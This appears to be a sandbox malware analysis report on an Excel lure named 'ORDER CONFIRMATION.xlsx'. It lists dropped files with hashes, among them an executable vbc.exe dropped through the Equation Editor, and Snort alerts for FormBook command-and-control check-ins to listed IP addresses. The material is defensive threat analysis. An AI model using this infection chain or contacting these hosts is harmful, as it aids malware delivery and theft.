                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F46F433.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):33795
                                                                                      Entropy (8bit):7.909466841535462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                      MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                      SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                      SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                      SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7383DB7B.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83C4F71D.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):14198
                                                                                      Entropy (8bit):7.916688725116637
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4ED7E41.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):7006
                                                                                      Entropy (8bit):7.000232770071406
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                                                      MD5:971312D4A6C9BE9B496160215FE59C19
                                                                                      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                                                      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                                                      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3FA08B4.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4E1B898.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):7006
                                                                                      Entropy (8bit):7.000232770071406
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                                                      MD5:971312D4A6C9BE9B496160215FE59C19
                                                                                      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                                                      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                                                      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFE3BF36.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):648132
                                                                                      Entropy (8bit):2.8123866129936412
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:M34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:+4UcLe0JOcXuunhqcS
                                                                                      MD5:113F32E1934BC0E35EEE5FF818BE29A2
                                                                                      SHA1:5A8B1604EE71AB705333F8801B4257ABFFCD0201
                                                                                      SHA-256:DEDBE06A88A213D59E39F84939526B4ECCAD8ED4EC26BD9FE3CD748F33090511
                                                                                      SHA-512:4D2D418011596BE9A4F05BA424016F22B8FFBEBA7D552A17D722D42C6BA2D3ACE88BECD19E13B488AF22EC6731AA4ADC565F3A9017918646099D859597D9D3F1
                                                                                      Malicious:false
                                                                                      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$.......-z.X.@..%...h....................N0Z............x........N0Z........ ....y.X........ ............z.X............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X.......<..............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6282740.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):33795
                                                                                      Entropy (8bit):7.909466841535462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                      MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                      SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                      SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                      SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5DAEFB9.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):84203
                                                                                      Entropy (8bit):7.979766688932294
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                      MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F90639BF.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):7788
                                                                                      Entropy (8bit):5.523444764822477
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:wHCHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wHTrZuloOSGZboS/C93n+KuI
                                                                                      MD5:19CEE3A6741FA847BB3B6049C6D44989
                                                                                      SHA1:D3AB8B9DE9780CD057FC1E210C47533A2E3EA704
                                                                                      SHA-256:DF50928E8F40F0258DA68BFFD210760789C670101AFC17CC6C8334DD0313A66F
                                                                                      SHA-512:2C7B73617C55D99B3C70ECB8B0904A056AEDEF193066208A514FAD02B6C5F53F803FC196E40C72DB03EB4980314305FF3D53342117623F711EE97967EFD9E4AE
                                                                                      Malicious:false
                                                                                      Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....{.d...........................p....\.............|....p.......<5.u..p....`.p....$y.w............8.....w....$.....r.d...........^.p.....^.p................-...d...<.w................<.9u.Z.v....X.\...............................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                                                                                      C:\Users\user\Desktop\~$ORDER CONFIRMATION.xlsx
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):330
                                                                                      Entropy (8bit):1.4377382811115937
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                      Malicious:true
                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      C:\Users\Public\vbc.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):556544
                                                                                      Entropy (8bit):7.182791197610268
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:7WHCM2K4Cz8liFBdgtM6lf2vo45Rm5fv1zCln:h3CzeiDdIMAfEofftzk
                                                                                      MD5:989933E361010648C467C6D7B6C2D812
                                                                                      SHA1:3BD47D097B8CD69083445EB0417B0059FA806542
                                                                                      SHA-256:34A89EDA5DD4AEF3EFB096011F27BBA7354B4C624D5DC01F4B43A18AC42D6AF4
                                                                                      SHA-512:F98B8337F527B49A4E5BD659CD6264D22F43C31EAAB55CCA4BF79EE2C5C5405D5CD78D1176759A0E0287E5FEB82675EF0D73DDA918FB9289ACC9D84DA466C60F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6...............0..t.............. ........@.. ....................................@.................................x...O...................................\................................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B........................H........?..._......o...................................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:CDFV2 Encrypted
                                                                                      Entropy (8bit):7.988579713004966
                                                                                      TrID:
                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                      File name:ORDER CONFIRMATION.xlsx
                                                                                      File size:597504
                                                                                      MD5:e1e18c326feb4aea3a983f390e0e36c2
                                                                                      SHA1:7d0abdd1c61dac8dfb411fde050381149fa1aaff
                                                                                      SHA256:a53f9cefce2fc02da9726d54387b05952a3956b9da65c6927c96250b44099d9a
                                                                                      SHA512:60b789ed55e1b4129b6cb7a9f57e463cb4f21a77ba0f9060269618df6c0035c7bd70e8fe8fabb8ca44435f098acbf9f38d6a7aead6f7a4bf7202eced0592b416
                                                                                      SSDEEP:12288:52/yYOLyJMy9tyEqnF8VPv8+BRZlJf+jgGpVABfGiggRBZ:52/Tg+ryGVPv3ZlF+jgGpVAlGqR7
                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                      File Icon

                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      09/15/21-11:18:05.138832TCP1201ATTACK-RESPONSES 403 Forbidden804916934.102.136.180192.168.2.22
                                                                                      09/15/21-11:18:10.217119TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:18:10.217119TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:18:10.217119TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.98.99.30
                                                                                      09/15/21-11:18:10.331685TCP1201ATTACK-RESPONSES 403 Forbidden804917034.98.99.30192.168.2.22
                                                                                      09/15/21-11:18:20.416021TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                      09/15/21-11:18:20.416021TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                      09/15/21-11:18:20.416021TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                                                      09/15/21-11:18:20.531202TCP1201ATTACK-RESPONSES 403 Forbidden804917134.102.136.180192.168.2.22
                                                                                      09/15/21-11:18:30.822018TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22184.168.131.241
                                                                                      09/15/21-11:18:30.822018TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22184.168.131.241
                                                                                      09/15/21-11:18:30.822018TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.22184.168.131.241
                                                                                      09/15/21-11:19:13.272679TCP1201ATTACK-RESPONSES 403 Forbidden804917634.102.136.180192.168.2.22
                                                                                      09/15/21-11:19:54.712455TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918080192.168.2.2234.102.136.180
                                                                                      09/15/21-11:19:54.712455TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918080192.168.2.2234.102.136.180
                                                                                      09/15/21-11:19:54.712455TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918080192.168.2.2234.102.136.180
                                                                                      09/15/21-11:19:54.827491TCP1201ATTACK-RESPONSES 403 Forbidden804918034.102.136.180192.168.2.22
                                                                                      09/15/21-11:20:05.010582TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918280192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:05.010582TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918280192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:05.010582TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918280192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:05.125579TCP1201ATTACK-RESPONSES 403 Forbidden804918234.102.136.180192.168.2.22
                                                                                      09/15/21-11:20:15.480022TCP1201ATTACK-RESPONSES 403 Forbidden804918434.102.136.180192.168.2.22
                                                                                      09/15/21-11:20:20.496012TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918580192.168.2.2234.98.99.30
                                                                                      09/15/21-11:20:20.496012TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918580192.168.2.2234.98.99.30
                                                                                      09/15/21-11:20:20.496012TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918580192.168.2.2234.98.99.30
                                                                                      09/15/21-11:20:20.611011TCP1201ATTACK-RESPONSES 403 Forbidden804918534.98.99.30192.168.2.22
                                                                                      09/15/21-11:20:30.639824TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918680192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:30.639824TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918680192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:30.639824TCP2031412ET TROJAN FormBook CnC Checkin (GET)4918680192.168.2.2234.102.136.180
                                                                                      09/15/21-11:20:30.756136TCP1201ATTACK-RESPONSES 403 Forbidden804918634.102.136.180192.168.2.22
                                                                                      09/15/21-11:20:49.990019TCP2031453ET TROJAN FormBook CnC Checkin (GET)4918880192.168.2.22184.168.131.241
                                                                                      09/15/21-11:20:49.990019TCP2031449ET TROJAN FormBook CnC Checkin (GET)4918880192.168.2.22184.168.131.241
